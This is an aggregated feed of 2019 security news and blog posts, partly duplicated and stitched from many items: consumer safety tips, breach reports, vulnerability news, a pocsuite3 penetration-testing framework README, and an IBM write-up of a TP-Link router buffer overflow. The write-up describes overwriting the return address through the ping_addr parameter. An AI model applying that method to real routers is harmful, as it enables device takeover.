In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. But how exactly does the heir to the Iron Throne pose a cyberthreat to her loyal subjects? Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters of the Seven Kingdoms into their trap.

Thankfully, there are plenty of ways fans can keep up with Khaleesi without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Malware is Coming: Emilia Clarke Is the Most Dangerous “Game of Thrones” Celebrity appeared first on McAfee Blogs.



McAfee Blogs

Malware is Coming: Emilia Clarke Is the Most Dangerous “Game of Thrones” Celebrity

The net is dark and full of terrors, especially for fans of HBO’s coveted show “Game of Thrones.” As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just white walkers and the Night King to worry about. According to a McAfee’s study on the Most Dangerous Celebrities, it turns out that the Mother of Dragons herself Emilia Clarke is among those whose search results are most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. But how exactly does the heir to the Iron Throne pose a cyberthreat to her loyal subjects? Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters of the Seven Kingdoms into their trap.

Thankfully, there are plenty of ways fans can keep up with Khaleesi without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Malware is Coming: Emilia Clarke Is the Most Dangerous “Game of Thrones” Celebrity appeared first on McAfee Blogs.

Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control

Internet routers are among the most ubiquitous devices home and business users depend on every day to carry out communications, banking, shopping and commercial transactions. IBM Security researcher Grzegorz Wypych (aka h0rac) took a closer look at one of the most widespread internet routers in use by consumers nowadays, the TP-Link WR-940, and found that a zero-day buffer overflow vulnerability in the router could allow malicious third parties to take control of the device from a remote location.

Let’s dive into more details about this vulnerability, which has been responsibly disclosed to TP-Link by IBM Security and was subsequently issued patches that appear in the closing words of the article.

TP-Link WR940

Figure 1: TP-Link WR940 (Source: TP-Link)

Authenticate and Control

Looking into commonly used routers, our team of ethical hackers examined some of the models that many consumers use in their homes. The reason behind examining router security is their omnipresent status and the potential for attackers to use them against internet users and businesses alike, while mostly relying on automated attacks.

This is the first part in a series of router vulnerability reports. Here, we’ll focus on the TP-Link WR940 device and touch on the software that runs the router — more specifically, TL-WR940N hardware version 3 and TL-WR941ND hardware version 6, both running firmware version 150312.

In the case of these routers, we found a zero-day buffer overflow vulnerability, one that was not previously reported and that worked for authenticated users, allowing them to take unrestricted remote control of the router.

Looking at the software security of the device, it appears that most of the effort to apply controls was put into the web-based interface that users can access to configure the router. However, controls that were placed on the owner’s interface cannot protect the actual router and could allow an attacker to take advantage of that fact.

For example, in the System Tools/Diagnostic tab of the control panel, users have the option to send Internet Control Message Protocol (ICMP) echo requests/response packets via ping. They can send packets either to an IPv4 address or to a hostname. The panel’s security controls may limit character type and number, but nothing stops the user from intercepting requests with a Burp Suite (a graphical tool for testing web application security) proxy and malforming them.

Bug by Bug

We started by looking for some common application vulnerabilities. First we examined command injections because operations such as ping are mostly executed using a Bash shell (Bash is a Unix shell and command language). This was not the case, and we had to rule out the injection attack scenario because we did not find any reference to a system call during static analysis.

What we did find was another interesting activity: When a user sends ping requests, a message is displayed on the device’s console referring to native code compiled to the firmware’s binary.

Ping requests invoke message on router's console

Figure 2: Ping requests invoke a message on the router’s console

Next, we looked at outgoing GET requests to the ping service by running a Burp Suite proxy to examine them. In the following image, we can see the request’s parameters. The same parameters also appeared in the console message shown in Figure 2.

GET request to

Figure 3: GET request to ping service

To zoom into the details, we launched the IDA disassembler and looked at some string references. More specifically, we were looking for the “Here is a new ping” reference.

GET request to ping service on IDA Pro

Figure 4: GET request to ping service on IDA Pro

From here, we jumped directly to the referenced function’s address:

# DATA XREF: sub_44C610+5E0↑o

And here, we can see a notable message block:

Message block shown in IDA Pro

Figure 5: Message block shown in IDA Pro

The syntax is written in the Microprocessor without Interlocked Pipeline Stages (MIPS) Assembly language, which is designed to work with the MIPS microprocessor paradigm created by J. L. Hennessy in 1981. It is typically used in embedded systems, such as gateways and routers.

Before we look more closely at this message block, here’s a quick crash course on MIPS central processing units (CPUs):

  • Function parameters are passed in registers $a0-$a3. If a function requires more than four parameters, it is pushed onto the stack.
  • Register $t9 is often used as a holder for the jump address. We usually load the memory address and jump to it using jalr instruction.
  • The called function must save any $s0-$sX registers, where X is the max number of available registers of type $s.
  • The return value is saved in the $v0 or $v1 registers.

Classic Buffer Overflow

Armed with these basics, we can move to the next step of the analysis. In the following image, we can see that the printf function receives a pointer to a string that appears in the console log we looked at earlier (Figure 2). The parameter in this case is being loaded to the $a0 register.

Next, we will invoke the ipAddrDispose function. This one gets loaded to the $a2 register value of 564 in decimal, which could be a parameter in the function. Let’s jump to that function and see what’s inside.

ipAddrDispose' function exposing buffer overflow issue

Figure 6: ipAddrDispose’ function exposing buffer overflow issue

We won’t go through a line-by-line analysis here; this is only a fragment of the entire function. What’s interesting about it is the strcpy function call, which is the start of the TP-Link httpd process control, the vulnerable binary. What we have here is a classic buffer overflow issue.

The function copies the input it receives byte by byte and stores it in a buffer of a size that is not properly being handled. The data therefore exceeds the buffer’s boundaries.

We have our bug, but can it truly be exploited? We can find out whether this zero-day is critical by creating a proof-of-concept of an attack scenario.

Status: Exploitable

The first action to attempt when looking at a buffer overflow is to check what happens when the data size exceeds the available space. We will therefore change the ping_addr parameter to hold number of 0x41(A)s, exceeding the buffer’s size. In the following image, the ipAddrDispose function reserves 224 bytes (hexadecimal 0xE0) for its stack frame.

ipAddrDispose reserves 224 bytes for its stack frame

Figure 7: ipAddrDispose reserves 224 bytes for its stack frame

Since the stack can take 224 byes, we elected to send through 300 bytes of A’s instead and see what happens. To do that, we modified the ping_addr parameter in the HTTP request after intercepting it with a Burp suite instance.

Sending 300 bytes of A's to limited stack

Figure 8: Sending 300 bytes of A’s to limited stack

By the following message on the console, we can see that, indeed, it is possible to override the return address $ra and begin controlling program execution.

Router console message shows that address override is possible

Figure 9: Router console message shows that address override is possible

Some Pre-Exploit Recon

Before writing an exploit, it is wise to check what is being overwritten here when the oversized payload is sent through. Let’s take a closer look at the core memory dump, which is typically dumped to the /tmp folder.

What we are looking for is information that will help craft the exploit down the line. More specifically, we want to see what registers we can control if we exploit this bug.

To analyze the core memory dump, we downloaded it to our host and placed it in the folder where the extracted file system is found (the httpd binary).

Figure 10: Analyzing TP-Link router core memory dump

Figure 10: Analyzing TP-Link router core memory dump

Remember, this is MIPS architecture. The next step here will be to open the core dump using gdb-multiarch, which is a GNU Debugger (GDB) with support for multiple architectures. GDB is a source-level debugger that is capable of breaking programs at any specific line, displaying variable values and determining where errors occurred.

Using gdb-multiarch to open core memory dump

Figure 11: Using gdb-multiarch to open core memory dump

We can now control three registers:

  1. $s0;
  2. $s1; and
  3. $ra.

The $a0 register was only partially under our control because it only refers to an address on the stack. Also, keep in mind that the exploitation is taking place on MIPS architecture, which is very different than an exploit written for web application buffer overflow bugs. With this information, we started writing a working exploit code.

Routers: A Modern-Day Essential in Dire Need of Better Security

The American Consumer Institute (ACI) looked into router security and found that no less than 83 percent of routers harbor high-risk vulnerabilities, many of which are open-source flaws. This staggering ratio accounts for both home and office routers and includes major name brands sold around the world.

Routers are not just a relay switch; they have their own operating systems, their own software and, inevitably, their own vulnerabilities. Router vulnerabilities are rather common and can be attributed to various factors. It starts with internet service providers (ISPs) issuing the same router to millions of customers and inadvertently allowing vulnerability aggregation when zero-days arise, but it has more to do with the software that runs routers.

Most manufacturers outsource firmware that gets developed with costs in mind. As such, it is rarely elaborate and, judging by the amount of router vulnerabilities out there, also rarely tested or secure. Making matters worse is the patch and update process: When was the last time you got a message prompting you to update your router’s firmware? Likely almost never. This means that even when patches are dealt with and become available to the public, most users will never know of them or know to take action.

We won’t delve into open networking ports and unsecured protocols that run home routers — think Universal Plug and Play (UPnP), Home Network Administration Protocol (HNAP) and the Wi-Fi Protected Setup (WPS) password — but those interested in further reading should look them up.

How much do these vulnerabilities matter? A lot. At the very least, router vulnerabilities can lead to consumer data being compromised and used by attackers. The same issue can allow criminal/nation-state third parties to spy on users, send them to phishing and malware-hosting websites, or alter data the user sends out when browsing the internet. Routers can also be infected by malware and enslaved by a malicious internet of things (IoT) botnet such as VPNFilter, which can eavesdrop on traffic passing through the router, or the Mirai botnet, which disrupted internet connections as well as telephony and television services in Germany for days before it was possible to stop the mayhem.

Vulnerabilities on routers used by businesses can have similar impacts at scale and likely touch on even more valuable information that could interest cybercriminals and nation-state threat actors alike.

Secure Development, Testing and Better Controls

Limiting the vulnerability of any software to attacks is a task that calls for security in the early stages of the development cycle. The sooner security professionals are introduced to the project, the better the chances are that the end result will be more secure; as a bonus, it is also likely to be much less costly. If that is not a possibility, not all is lost: Scanning code after it is written can also help fix issues and make it more resilient to attacks.

Another way to find and fix issues after devices have been released to the marketplace is by testing them. Penetration testing should look at both code-related security gaps and hardware-related exploitation possibilities. When these are found, they should be prioritized for remediation and addressed promptly to secure the user base from potential attacks.

Router vendors can better enable users with additional security controls: longer password standards, two-factor authentication (2FA) options, more warning prompts when remote access can be attained by unauthorized parties, and the ability to separate modem and router functions, to name a few. Routers are an essential part of almost every home’s communication consumption, and security has become equally essential to keep those homes and their residents’ data and privacy safe.

TP-Link Patches for Users of These Models

After disclosure, TP-Link’s security team released a patch and indicated that both devices in these hardware versions are no longer being manufactured (product end of life).

The new firmware has been published on the website for both devices in their affected hardware revisions (firmware is labeled 190218).

Support/Download Page Links

The post Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control appeared first on Security Intelligence.

Magento sites under attack through easily exploitable SQLi flaw

A recently patched SQL injection flaw affecting the popular open-source e-commerce platform Magento is being actively exploited by attackers, so if you haven’t implemented the provided security update or patch, now is the time to do it. Magento devs, if you haven't patched already, do it ASAP. We've already seen attempts at two of our shops using the published POC. We're safe because we already patched every shop on Wednesday. https://t.co/5nZjMGBEUu — Peter Jaap Blaakmeer … More

The post Magento sites under attack through easily exploitable SQLi flaw appeared first on Help Net Security.

The unique business-critical threats facing converged IT-OT systems

Manufacturing networks still running outdated technology could risk their intellectual property and production processes. The Trend Micro report, Securing Smart Factories: Threats to Manufacturing Environments in the Era of Industry 4.0, outlines the security dimension of a new era for manufacturing driven by IoT and connectivity everywhere. Manufacturers are heavily investing in the convergence of traditional operational technology (OT) with IT networks in 2019, adding new technology to environments that are still vulnerable to more … More

The post The unique business-critical threats facing converged IT-OT systems appeared first on Help Net Security.

Pocsuite3 – An Open-Sourced Remote Vulnerability Testing Framework

pocsuite3 is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team. It comes with a powerful proof-of-concept engine, many powerful features for the ultimate penetration testers and security researchers.

Features
  • PoC scripts can running with attack,verify, shell mode in different way
  • Plugin ecosystem
  • Dynamic loading PoC script from any where (local file, redis , database, Seebug ...)
  • Load multi-target from any where (CIDR, local file, redis , database, Zoomeye, Shodan ...)
  • Results can be easily exported
  • Dynamic patch and hook requests
  • Both command line tool and python package import to use
  • IPV6 support
  • Global HTTP/HTTPS/SOCKS proxy support
  • Simple spider API for PoC script to use
  • Integrate with Seebug (for load PoC from Seebug website)
  • Integrate with ZoomEye (for load target from ZoomEye Dork)
  • Integrate with Shodan (for load target from Shodan Dork)
  • Integrate with Ceye (for verify blind DNS and HTTP request)
  • Friendly debug PoC scripts with IDEs
  • More ...

Screenshots

pocsuite3 console mode


pocsuite3 shell mode


pocsuite3 load PoC from Seebug


pocsuite3 load multi-target from ZoomEye


pocsuite3 load multi-target from Shodan


Requirements
  • Python 3.4+
  • Works on Linux, Windows, Mac OSX, BSD

Installation
The quick way:
$ pip install pocsuite3
Or click here to download the latest source zip package and extract
$ wget https://github.com/knownsec/pocsuite3/archive/master.zip
$ unzip master.zip
The latest version of this software is available from: http://pocsuite.org

Documentation
Documentation is available in the english docs / chinese docs directory.


150 million Xiaomi smartphones has pre-installed app that put it at security risk

Security researcher finds pre-installed apps on 150 million Xiaomi phones vulnerable to attacks

Check Point researcher Slava Makkaveev discovered a vulnerability that comes as a part of Xiaomi’s pre-installed security and non-removable app ‘Guard Provider’, which ironically is meant to protect the phone from malware.

“This vulnerability discovered in Xiaomi’s ‘Guard Provider,’ however, raises the worrying question of who is guarding the guardian. And although the guardian should not necessarily need guarding, clearly when it comes to how apps are developed, even those built in by the smartphone vendor, one cannot be too careful,” Makkaveev said in his blog post.

Guard Provider allows users to choose from three antivirus scanners, Avast, AVL and Tencent built-in to detect potential malware. The app receives its updates through an unsecured HTTP connection.

“Briefly put, due to the unsecured nature of the network traffic to and from Guard Provider, a threat actor could connect to the same Wi-Fi network as the victim and carry out a Man-in-the-Middle (MiTM) attack. Then, as part of a third-party SDK update, he could disable malware protections and inject any rogue code he chooses such to steal data, implant ransomware or tracking or install any other kind of malware.”

The vulnerability is due to “SDK Fatigue” which is due to increased use of multiple SDKs within the same app makes the app more susceptible to problems such as “crashes, viruses, malware, privacy breaches, battery drain, slowdown, and many other problems.”

Further, the use of several SDKs within the same app could create unpreventable issues for the developers such as:

  1. A problem in one SDK would compromise the protection of all the others.
  2. The private storage data of one SDK cannot be isolated and can, therefore, be accessed by another SDK.

By using too many SDKs within the same app, developers leave “organizations and users exposed to potential pitfalls that can be exploited by threat actors to interfere with the regular operation of the device,” Makkaveev concluded.

Following a disclosure report from Check Point Research, Xiaomi shortly patched the flaw that exposed users to MiTM attack.

A Xiaomi spokeswoman said in a statement, “Xiaomi is aware of this and [has] already worked with our partner Avast to fix it.”

For more information about the vulnerability, you can read the Check Point blog.

The post 150 million Xiaomi smartphones has pre-installed app that put it at security risk appeared first on TechWorm.

New malware can modify CT and MRI scan results

By Waqas

Call it killer malware? Israeli researchers have developed a new malware that highlights some very critical and dangerous security vulnerabilities in medical imaging equipment, which is commonly used to diagnose serious health conditions like cancer and hypertrophic cardiomyopathy (HCM). Not only can the malware impact the diagnosis of the imaging equipment but can also compromise […]

This is a post from HackRead.com Read the original post: New malware can modify CT and MRI scan results

Hackers Could Turn Pre-Installed Antivirus App on Xiaomi Phones Into Malware

What could be worse than this, if the software that's meant to protect your devices leave backdoors open for hackers or turn into malware? Researchers today revealed that a security app that comes pre-installed on more than 150 million devices manufactured by Xiaomi, China's biggest and world's 4th largest smartphone company, was suffering from multiple issues that could have allowed remote

Vulnerability found in Guard Provider, Xiaomi’s pre-installed security app

Check Point Research discovered a vulnerability in one of the preinstalled apps on devices manufactured by one of the world’s biggest mobile vendors, Xiaomi. The vulnerability would have allowed an attacker to carry out a Man-in-the-Middle (MiTM) attack and inject any rogue code he chooses such as password stealing, ransomware, tracking or any other kind of malware onto the device. The vulnerability is in the pre-installed security app, Guard Provider, which should protect the phone … More

The post Vulnerability found in Guard Provider, Xiaomi’s pre-installed security app appeared first on Help Net Security.

[SANS ISC] New Waves of Scans Detected by an Old Rule

I published the following diary on isc.sans.edu: “New Waves of Scans Detected by an Old Rule“:

Who remembers the famous ShellShock (CVE-2014-6271)? This bug affected the bash shell in 2014 and was critical due to the facts that it was easy to exploit and that bash is a widespread shell used in many tools/applications. So, at this time, I created an OSSEC alerts to report ShellShock exploitation attempts against my servers. Still today, I’m getting a hit on this rule from time to time… [Read more]

[The post [SANS ISC] New Waves of Scans Detected by an Old Rule has been first published on /dev/random]

Smashing Security #122: The big fat con at Office Depot

Smashing Security #122: The big fat con at Office Depot

Office Depot and OfficeMax are fined millions for tricking customers into thinking their computers were infected with malware, car alarms can make your vehicle less secure, and facial recognition in apartment blocks comes under the microscope.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire’s Dave Bittner.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

McAfee Blogs: Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.



McAfee Blogs

Users Complain Of A Skype App Bug That Answers Calls Automatically

Earlier this year, Skype’s Android app made it to the news due to an authentication bypass vulnerability. Once again, a

Users Complain Of A Skype App Bug That Answers Calls Automatically on Latest Hacking News.

Magento Flaw Lets Cybercriminals Access E-Commerce Sites Without Authentication

Security researchers discovered a Magento flaw that could allow threat actors to penetrate and control features within the popular e-commerce site without authentication.

The Adobe-owned company rushed to offer a patch after a blog post on Sucuri late last week outlined details of an injection vulnerability dubbed PRODSECBUG-2198. Cybercriminals would have to download and crack the necessary password hashes to exploit the vulnerability, but once they do, it would be relatively simple to skim credit card numbers or install backdoors.

In fact, the Magento flaw was given a rating of 8.8, or “very easy” in terms of how readily it could be used to target e-commerce sites.

Reverse Engineering the Magento Flaw

To prove the severity of the threat, researchers said they were able to reverse engineer the official patch and create a working proof of concept of how it might be used by attackers. The vulnerability threatens e-commerce sites that use both the commercial edition of Magento and the open-source version and may go back to some of the product’s earliest releases.

So far, attacks in the wild have not been reported. However, researchers said cybercriminals could use the Magento flaw to inject SQL commands to steal admin rights, usernames and passwords, and other sensitive information. Worse, such attacks could be automated to target a wider pool of vulnerable e-commerce sites simultaneously — a serious concern given that Magento has an estimated 300,000 customers.

The patch subsequently released by Magento covers several other bugs. In the meantime, the researchers recommended monitoring for multiple hits to paths such as /catalog/product/frontend_action_synchronize, which might indicate threat actor are trying to exploit the vulnerability.

Assess Your Patch Management Posture

Effective patch management is critical to defend against threats exploiting the Magento vulnerability. Patch posture reporting can help security teams determine the severity of the threat, when a patch was released, whether other patches have since superseded it and even which machines might be offline for repair. This enables the organization to measure the effectiveness of both its patch management processes and the patches themselves in remediating threats.

The post Magento Flaw Lets Cybercriminals Access E-Commerce Sites Without Authentication appeared first on Security Intelligence.

Patched Apache flaw is a serious threat for web hosting providers

Organizations running Apache web servers are urged to implement the latest security update to fix a serious privilege escalation flaw (CVE-2019-0211) that can be triggered via scripts and could allow unprivileged web host users to execute code with root privileges, i.e. allow them to gain complete control of the machine. About CVE-2019-0211 Discovered by security researcher Charles Fol and dubbed Carpe Diem, the vulnerability affects only Apache HTTP Server on Unix systems. “In Apache HTTP … More

The post Patched Apache flaw is a serious threat for web hosting providers appeared first on Help Net Security.

Georgia Tech data breach: 1.3M students and staff potentially affected

The Georgia Institute of Technology, commonly referred to as Georgia Tech, has suffered yet another data breach. This time, the number of affected individuals may have reached 1.3 million. What is known about the breach? “Application developers for the Institute noticed a significant performance impact in one of its web applications and began an investigation on March 21, 2019. During this investigation it was determined the performance issue was the result of a security incident,” … More

The post Georgia Tech data breach: 1.3M students and staff potentially affected appeared first on Help Net Security.

Indian Health Agency Exposed 12.5 Million Records Of Pregnant Women

Another medical data leak has surfaced online. This time, a medical agency linked with the Indian government exposed records of

Indian Health Agency Exposed 12.5 Million Records Of Pregnant Women on Latest Hacking News.

New Apache Web Server Bug Threatens Security of Shared Web Hosts

Mark J Cox, one of the founding members of the Apache Software Foundation and the OpenSSL project, today posted a tweet warning users about a recently discovered important flaw in Apache HTTP Server software. The Apache web server is one of the most popular, widely used open-source web servers in the world that powers almost 40 percent of the whole Internet. The vulnerability, identified as

Tesla autopilot feature hacked to risk oncoming traffic

By Waqas

Tesla’s High-End Vehicle’s Lane Recognition System not Free from Technical Glitches- Keen Labs Claims in New Research. Cybersecurity firm Keen Labs published a research paper [PDF] on Saturday in which it described the three hacks that the company detected that can be used to manipulate Tesla Model S. The first two hacks were directed towards the […]

This is a post from HackRead.com Read the original post: Tesla autopilot feature hacked to risk oncoming traffic

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

McAfee Blogs: The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
